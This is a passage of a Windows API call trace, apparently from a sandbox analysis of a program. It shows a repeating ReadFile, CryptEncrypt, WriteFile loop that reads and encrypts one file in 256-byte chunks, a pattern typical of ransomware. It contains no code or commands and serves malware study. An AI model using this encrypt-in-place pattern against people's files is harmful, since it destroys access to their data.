lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.182] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.182] GetLastError () returned 0x0 [0168.182] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.182] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.183] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.183] GetLastError () returned 0x0 [0168.183] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.184] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.184] GetLastError () returned 0x0 [0168.184] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.184] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.184] GetLastError () returned 0x0 [0168.184] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.184] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.184] GetLastError () returned 0x0 [0168.184] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.184] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.184] GetLastError () returned 0x0 [0168.184] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.184] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.184] GetLastError () returned 0x0 [0168.184] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.184] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.184] GetLastError () returned 0x0 [0168.184] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.184] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.185] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.185] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.185] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.185] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.185] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.185] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.185] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.185] GetLastError () returned 0x0 [0168.185] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.186] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.186] GetLastError () returned 0x0 [0168.186] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.186] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.186] GetLastError () returned 0x0 [0168.186] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.186] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.186] GetLastError () returned 0x0 [0168.186] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.186] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.186] GetLastError () returned 0x0 [0168.186] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.186] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.186] GetLastError () returned 0x0 [0168.186] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.186] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.186] GetLastError () returned 0x0 [0168.186] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.186] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.187] GetLastError () returned 0x0 [0168.187] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.187] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.187] GetLastError () returned 0x0 [0168.187] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.187] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.187] GetLastError () returned 0x0 [0168.187] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.187] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.187] GetLastError () returned 0x0 [0168.187] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.187] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.187] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.187] GetLastError () returned 0x0 [0168.187] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.187] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, 